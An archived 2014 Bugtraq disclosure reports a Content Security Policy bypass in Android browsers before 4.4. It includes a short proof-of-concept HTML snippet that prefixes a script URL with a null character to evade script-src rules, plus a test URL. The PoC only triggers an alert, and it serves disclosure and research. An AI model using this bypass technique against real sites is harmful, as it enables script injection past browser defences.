lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201410101545.s9AFjAUA011144@sf01web3.securityfocus.com> Date: Fri, 10 Oct 2014 15:45:10 GMT From: evanjjohns@...il.com To: bugtraq@...urityfocus.com Subject: CSP Bypass in android browser prior to 4.4 Hello. I hope this is the correct place to report this bug. I've found a Content Security Policy bypass similar to the same and related to the same origin policy bypass in this CVE. This is a separate vulnerability, however. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041 I've tested this on an Android 4.3 tablet. I've tested this and it works on Firefox (32.0.2), InBrowser, Dolphin (App info doesn't give version). I also tested the default android browser on 4.3.1 emulator which was also vulnerable. PoC: <input type=button value="test" onclick=" a=document.createElement('script'); a.id='AA'; a.src='\u0000https://js.stripe.com/v2/'; document.body.appendChild(a); setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{ alert(2);}}, 400); return false;"> The content security policy rule that should block this is script-src 'self' https://js.stripe.com/v2/ ; The PoC worked if you see a popup containing stripes e(){} object. You can test this on http://ejj.io/test.php Cheers, Evan J
Powered by blists - more mailing lists